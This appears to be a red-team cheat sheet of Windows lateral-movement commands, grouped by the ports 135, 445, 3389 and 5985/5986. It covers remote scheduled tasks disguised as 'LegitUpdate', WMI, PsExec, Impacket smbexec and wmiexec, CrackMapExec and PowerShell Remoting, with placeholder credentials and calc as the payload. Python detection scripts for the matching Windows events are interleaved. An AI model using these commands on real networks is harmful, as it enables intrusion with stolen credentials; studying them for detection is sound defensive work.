It’s a good idea to do a minimal port scan before anything else. Look for ports 135 (DCOM), 445 (SMB), 3389 (RDP), and 5985 & 5986 (WinRM). If your Windows host is fairly modern, the built-in PowerShell cmdlet Test-NetConnection works as a simple port scanner.

Get-Content hosts.txt | % { Test-NetConnection $_ -Port 445 }

If the cmdlet isn’t available, there are plenty of scripts to use instead, such as Invoke-Portscan.

Import-Module .\Invoke-Portscan.ps1
Invoke-Portscan -Hosts HOST -Ports 135,445,3389,5985,5986
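From the defender's side, the loop above looks like one source touching many hosts on the same handful of admin ports within seconds. The following is an added example (not part of the original cheat sheet) that finds that fan-out pattern in connection records; the records are constructed in the shape of Sysmon Event ID 3 fields, and the thresholds are assumptions to tune per network.

```python
"""Spot lateral-movement style port sweeps in connection records.

Added example, not part of the original cheat sheet. The records below are
constructed in the shape of Sysmon Event ID 3 (network connection) fields;
any flow log carrying source, destination, port and time works the same way.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# The ports the cheat sheet says to look for first, keyed to their service.
ADMIN_PORTS = {135: "DCOM", 445: "SMB", 3389: "RDP", 5985: "WinRM", 5986: "WinRM-TLS"}

# Constructed sample log: 10.0.0.15 touches seven hosts on admin ports in a
# few seconds (a Test-NetConnection loop), while 10.0.0.40 is an ordinary
# client talking to one file server.
SAMPLE_CONNECTIONS = [
    {"time": "2024-05-01T03:00:01", "src": "10.0.0.15", "dst": "10.0.0.21", "dport": 445},
    {"time": "2024-05-01T03:00:02", "src": "10.0.0.15", "dst": "10.0.0.22", "dport": 445},
    {"time": "2024-05-01T03:00:02", "src": "10.0.0.15", "dst": "10.0.0.23", "dport": 135},
    {"time": "2024-05-01T03:00:03", "src": "10.0.0.15", "dst": "10.0.0.24", "dport": 3389},
    {"time": "2024-05-01T03:00:03", "src": "10.0.0.15", "dst": "10.0.0.25", "dport": 5985},
    {"time": "2024-05-01T03:00:04", "src": "10.0.0.15", "dst": "10.0.0.26", "dport": 5986},
    {"time": "2024-05-01T03:00:05", "src": "10.0.0.15", "dst": "10.0.0.27", "dport": 445},
    {"time": "2024-05-01T03:00:09", "src": "10.0.0.15", "dst": "10.0.0.28", "dport": 80},
    {"time": "2024-05-01T03:01:00", "src": "10.0.0.40", "dst": "10.0.0.5", "dport": 445},
    {"time": "2024-05-01T03:05:00", "src": "10.0.0.40", "dst": "10.0.0.5", "dport": 445},
    {"time": "2024-05-01T03:10:00", "src": "10.0.0.40", "dst": "10.0.0.6", "dport": 445},
]


def find_port_sweeps(records, min_hosts=5, window=timedelta(minutes=5)):
    """Return {src: sorted distinct hosts} for every source that reaches at
    least min_hosts distinct destinations on admin ports within `window`."""
    by_src = defaultdict(list)
    for rec in records:
        if rec["dport"] in ADMIN_PORTS:
            by_src[rec["src"]].append((datetime.fromisoformat(rec["time"]), rec["dst"]))

    sweeps = {}
    for src, events in by_src.items():
        events.sort()
        best = set()
        start = 0
        # Slide a time window over the sorted events and keep the largest
        # set of distinct destinations seen inside any single window.
        for end in range(len(events)):
            while events[end][0] - events[start][0] > window:
                start += 1
            hosts = {dst for _, dst in events[start:end + 1]}
            if len(hosts) > len(best):
                best = hosts
        if len(best) >= min_hosts:
            sweeps[src] = sorted(best)
    return sweeps


def describe(sweeps, records):
    """Human-readable lines: which admin services each sweeping host probed."""
    lines = []
    for src, hosts in sweeps.items():
        services = sorted({ADMIN_PORTS[r["dport"]] for r in records
                           if r["src"] == src and r["dport"] in ADMIN_PORTS})
        lines.append(f"{src} probed {len(hosts)} hosts on {', '.join(services)}")
    return lines


if __name__ == "__main__":
    for line in describe(find_port_sweeps(SAMPLE_CONNECTIONS), SAMPLE_CONNECTIONS):
        print(line)
```

The sliding window matters more than the raw count: a help desk workstation may reach many hosts on 3389 over a day, but rarely reaches seven on five different admin ports inside a minute.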

The following commands can be useful for moving around the network, provided you have the right credentials or privileges.

135

Create a scheduled task that runs your binary or script; as a bonus, it also provides persistence.

schtasks /create /f /sc once /st 03:00 /tn LegitUpdate /RU System /S HOST /tr "cmd /r calc"
at 03:00 \\HOST cmd /r "calc"
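A task created remotely with schtasks /S HOST or at \\HOST is registered on the target, which records it as Security Event ID 4698 together with the full task XML. The following added example (not from the original cheat sheet) parses that XML and scores the traits of the LegitUpdate task above: an interpreter as the action, a one-shot TimeTrigger, and a SYSTEM principal. The event records are constructed; the scoring weights and threshold are assumptions.

```python
"""Triage scheduled-task creations (Security Event ID 4698).

Added example, not part of the original cheat sheet. The events below are
constructed; TaskContent follows the Task Scheduler XML schema the event
really carries, and the first task mirrors the one-shot LegitUpdate task.
"""
import re
import xml.etree.ElementTree as ET

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
INTERPRETERS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe"}
SYSTEM_SID = "S-1-5-18"

# Constructed 4698 events. Real TaskContent opens with a UTF-16 declaration,
# which ElementTree can reject when handed a str, so the parser strips it.
SAMPLE_4698 = [
    {
        "SubjectUserName": "jdoe", "SubjectDomainName": "CORP",
        "TaskName": "\\LegitUpdate",
        "TaskContent": (
            '<?xml version="1.0" encoding="UTF-16"?>'
            '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
            "<Triggers><TimeTrigger><StartBoundary>2024-05-01T03:00:00</StartBoundary>"
            "</TimeTrigger></Triggers>"
            '<Principals><Principal id="Author"><UserId>S-1-5-18</UserId>'
            "<RunLevel>HighestAvailable</RunLevel></Principal></Principals>"
            '<Actions Context="Author"><Exec><Command>cmd</Command>'
            "<Arguments>/r calc</Arguments></Exec></Actions></Task>"
        ),
    },
    {
        "SubjectUserName": "SYSTEM", "SubjectDomainName": "NT AUTHORITY",
        "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
        "TaskContent": (
            '<?xml version="1.0" encoding="UTF-16"?>'
            '<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">'
            "<Triggers><CalendarTrigger><StartBoundary>2024-01-01T01:00:00</StartBoundary>"
            "<ScheduleByWeek><WeeksInterval>1</WeeksInterval></ScheduleByWeek>"
            "</CalendarTrigger></Triggers>"
            '<Principals><Principal id="Author"><UserId>S-1-5-18</UserId></Principal></Principals>'
            '<Actions Context="Author"><Exec><Command>%windir%\\system32\\defrag.exe</Command>'
            "<Arguments>-c -h -o -$</Arguments></Exec></Actions></Task>"
        ),
    },
]


def parse_task_content(content):
    """Parse the TaskContent XML, dropping the <?xml ...?> declaration first."""
    return ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", content))


def analyse_task(event):
    """Return (score, reasons) describing why a task looks like remote execution."""
    root = parse_task_content(event["TaskContent"])
    score, reasons = 0, []
    for action in root.findall(".//t:Actions/t:Exec", TASK_NS):
        command = (action.findtext("t:Command", "", TASK_NS) or "").strip().strip('"')
        arguments = action.findtext("t:Arguments", "", TASK_NS) or ""
        base = command.replace("/", "\\").rsplit("\\", 1)[-1].lower()
        if base in INTERPRETERS or base + ".exe" in INTERPRETERS:
            score += 3
            reasons.append(f"action runs interpreter {base} {arguments}".strip())
    has_time = root.find(".//t:Triggers/t:TimeTrigger", TASK_NS) is not None
    has_calendar = root.find(".//t:Triggers/t:CalendarTrigger", TASK_NS) is not None
    if has_time and not has_calendar:
        score += 2
        reasons.append("one-shot TimeTrigger (schtasks /sc once)")
    if root.findtext(".//t:Principal/t:UserId", "", TASK_NS) == SYSTEM_SID:
        score += 1
        reasons.append("runs as SYSTEM (/RU System)")
    return score, reasons


def flag_tasks(events, threshold=3):
    """Return [(TaskName, creator, reasons)] for events scoring at or above threshold."""
    flagged = []
    for event in events:
        score, reasons = analyse_task(event)
        if score >= threshold:
            creator = f'{event["SubjectDomainName"]}\\{event["SubjectUserName"]}'
            flagged.append((event["TaskName"], creator, reasons))
    return flagged


if __name__ == "__main__":
    for name, creator, reasons in flag_tasks(SAMPLE_4698):
        print(f"{name} created by {creator}: {'; '.join(reasons)}")
```

Scoring rather than a single match keeps the weekly SYSTEM-owned defrag task below the threshold while a one-shot SYSTEM task whose action is cmd /r still stands out; the SubjectUserName in the same event tells you which account registered it.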

Via the built-in WMIC command.

wmic /node:HOST /user:DOMAIN\USER /password:PASSWORD process call create "C:\Windows\System32\calc.exe"

Using Impacket’s wmiexec.

proxychains4 -q wmiexec.py USER:'PASSWORD'@HOST

445

A quick check to see whether you have the right privileges.

dir \\HOST\C$\

Explorer.exe can be used as a lateral movement tool, provided you have the right security context.

explorer /,\\HOST\C$\Windows\System32\cmd.exe

Create and start a service remotely.

sc \\HOST create SERVICENAME binpath= "c:\windows\system32\calc.exe"
sc \\HOST start SERVICENAME

With Sysinternals PsExec.

psexec \\HOST -u DOMAIN\USER -p PASSWORD ipconfig

Using Impacket’s smbexec.

proxychains4 -q smbexec.py USER:'PASSWORD'@HOST

Using CrackMapExec.

proxychains4 -q crackmapexec smb HOST -u USER -p 'PASSWORD' -x ipconfig
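The sc create, PsExec and smbexec methods above all work by registering a new service on the target, and every such registration is written to the System log as Event ID 7045 with the service name and ImagePath. The following added example (not from the original cheat sheet or any of those tools) triages 7045 records. The records are constructed: the second is shaped like PsExec's PSEXESVC service and the third like smbexec's default BTOBTO service as described in public write-ups, both approximations; the baseline set is an assumption a defender fills in per host.

```python
"""Triage service installations (System Event ID 7045) on a host.

Added example, not part of the original cheat sheet. Records are constructed;
the PSEXESVC and BTOBTO entries approximate what PsExec and smbexec register.
"""
import re

# Image paths that hand execution to a shell rather than a service binary.
INTERPRETERS = re.compile(
    r"(^|[\\/\s])(%comspec%|cmd(\.exe)?|powershell(\.exe)?|pwsh(\.exe)?)(\s|$)", re.I)
# UNC paths, admin shares and temp directories are not where services live.
ODD_LOCATIONS = re.compile(r"(\\\\[^\\]+\\[a-z]\$|\\admin\$|%temp%|\\temp\\)", re.I)
KNOWN_TOOL_SERVICES = {"psexesvc": "Sysinternals PsExec", "btobto": "Impacket smbexec"}

SAMPLE_7045 = [
    {"ServiceName": "SERVICENAME", "ImagePath": "c:\\windows\\system32\\calc.exe",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"ServiceName": "PSEXESVC", "ImagePath": "%SystemRoot%\\PSEXESVC.exe",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"ServiceName": "BTOBTO",
     "ImagePath": "%COMSPEC% /Q /c echo cd ^> \\\\127.0.0.1\\C$\\__output 2^>^&1 > %TEMP%\\execute.bat"
                  " & %COMSPEC% /Q /c %TEMP%\\execute.bat & del %TEMP%\\execute.bat",
     "StartType": "demand start", "AccountName": "LocalSystem"},
    {"ServiceName": "Spooler", "ImagePath": "C:\\Windows\\System32\\spoolsv.exe",
     "StartType": "auto start", "AccountName": "LocalSystem"},
]

# Services an administrator expects to see (re)installed on this host (assumed).
BASELINE = {"spooler"}


def triage_service(event, baseline=BASELINE):
    """Return the list of reasons a 7045 record deserves a look (empty if none)."""
    name, image = event["ServiceName"], event["ImagePath"]
    reasons = []
    if name.lower() in KNOWN_TOOL_SERVICES:
        reasons.append(f"service name matches {KNOWN_TOOL_SERVICES[name.lower()]}")
    if INTERPRETERS.search(image):
        reasons.append("ImagePath runs a command interpreter")
    if ODD_LOCATIONS.search(image):
        reasons.append("ImagePath references a UNC/admin share or temp directory")
    if name.lower() not in baseline:
        reasons.append("service not in the host baseline")
    return reasons


def flag_services(events, baseline=BASELINE):
    """Return {ServiceName: reasons} for every record with at least one reason."""
    flagged = {}
    for event in events:
        reasons = triage_service(event, baseline)
        if reasons:
            flagged[event["ServiceName"]] = reasons
    return flagged


if __name__ == "__main__":
    for name, reasons in flag_services(SAMPLE_7045).items():
        print(f"{name}: {'; '.join(reasons)}")
```

Tool service names are trivially renamed, so the name match is the weakest signal here; an ImagePath that is a shell one-liner writing to an admin share, or a demand-start service that the host has never seen before, survives renaming.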

3389

Windows’ own remote desktop service. It may not always be enabled, but it is worth a check nonetheless.

C:\Windows\System32\mstsc.exe
proxychains4 -q rdesktop HOST
proxychains4 -q xfreerdp /d:DOMAIN /u:USER /p:PASSWORD /v:HOST

5985 & 5986

With PowerShell Remoting you can pass credentials and run commands on multiple computers.

Enable-PSRemoting -Force
Set-Item WSMan:localhost\client\trustedhosts -value *

$user = 'DOMAIN\USER'; $pass = 'PASSWORD'
$SecureString = ConvertTo-SecureString $pass -AsPlainText -Force
$Creds = [pscredential]::new($user,$SecureString)
Invoke-Command -Credential $Creds -ComputerName HOST -ScriptBlock {Get-ChildItem C:\}

PowerShell Remoting can be used for an interactive session as well.

Enter-PSSession -ComputerName HOST -Credential $Creds
Exit-PSSession

Via winrs, the command-line client for Windows Remote Management.

winrs /r:HOST /u:USER /p:PASSWORD calc
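On the target, each of the remote-execution methods on this page leaves a characteristic parent process: commands started through WMI (the wmic and wmiexec lines in the 135 section) run under WmiPrvSE.exe, PsExec (445 section) runs its command under PSEXESVC.exe, and WinRM / PowerShell Remoting (Invoke-Command, Enter-PSSession and winrs above) runs it under wsmprovhost.exe. The following added example (not from the original cheat sheet or any of those tools) attributes process-creation events to those channels by parent. The records are constructed in the shape of Sysmon Event ID 1 fields; the wmiexec-style command line mirrors the pattern described in public write-ups and is an approximation.

```python
"""Attribute process creations to a remote-execution channel by parent process.

Added example, not part of the original cheat sheet. Records are constructed
in the shape of Sysmon Event ID 1 (Image, ParentImage, CommandLine, User).
"""
import ntpath

# Parent image name (lower-case) -> the remote-execution channel it implies.
CHANNEL_BY_PARENT = {
    "wmiprvse.exe": "WMI (wmic / wmiexec)",
    "psexesvc.exe": "PsExec",
    "wsmprovhost.exe": "WinRM / PowerShell Remoting",
}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}

SAMPLE_EVENTS = [
    # wmiexec-style: shell spawned by the WMI provider host, output to ADMIN$
    {"Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "CommandLine": "cmd.exe /Q /c ipconfig 1> \\\\127.0.0.1\\ADMIN$\\__1714532400.12 2>&1",
     "User": "CORP\\jdoe"},
    # psexec \\HOST ... ipconfig
    {"Image": "C:\\Windows\\System32\\ipconfig.exe",
     "ParentImage": "C:\\Windows\\PSEXESVC.exe",
     "CommandLine": "ipconfig",
     "User": "CORP\\jdoe"},
    # winrs /r:HOST ... calc
    {"Image": "C:\\Windows\\System32\\calc.exe",
     "ParentImage": "C:\\Windows\\System32\\wsmprovhost.exe",
     "CommandLine": "calc",
     "User": "CORP\\jdoe"},
    # Ordinary interactive shell: not remote execution
    {"Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "\"C:\\Windows\\System32\\cmd.exe\"",
     "User": "CORP\\alice"},
    # Service start by the SCM: not remote execution
    {"Image": "C:\\Windows\\System32\\spoolsv.exe",
     "ParentImage": "C:\\Windows\\System32\\services.exe",
     "CommandLine": "C:\\Windows\\System32\\spoolsv.exe",
     "User": "NT AUTHORITY\\SYSTEM"},
]


def classify(event):
    """Return the remote-execution channel implied by the parent, or None."""
    parent = ntpath.basename(event["ParentImage"]).lower()
    return CHANNEL_BY_PARENT.get(parent)


def remote_executions(events):
    """Return [(channel, child image name, user, child_is_shell)] for every
    process whose parent is one of the remote-execution host processes."""
    hits = []
    for event in events:
        channel = classify(event)
        if channel is None:
            continue
        child = ntpath.basename(event["Image"]).lower()
        hits.append((channel, child, event["User"], child in SHELLS))
    return hits


if __name__ == "__main__":
    for channel, child, user, is_shell in remote_executions(SAMPLE_EVENTS):
        marker = " [shell]" if is_shell else ""
        print(f"{channel}: {child}{marker} as {user}")
```

Scheduled tasks and sc-created services are deliberately left out of this map: their children run under svchost.exe (Schedule service) and services.exe respectively, the same parents as legitimate tasks and services, so they are better triaged from the 4698 and 7045 events than from process ancestry.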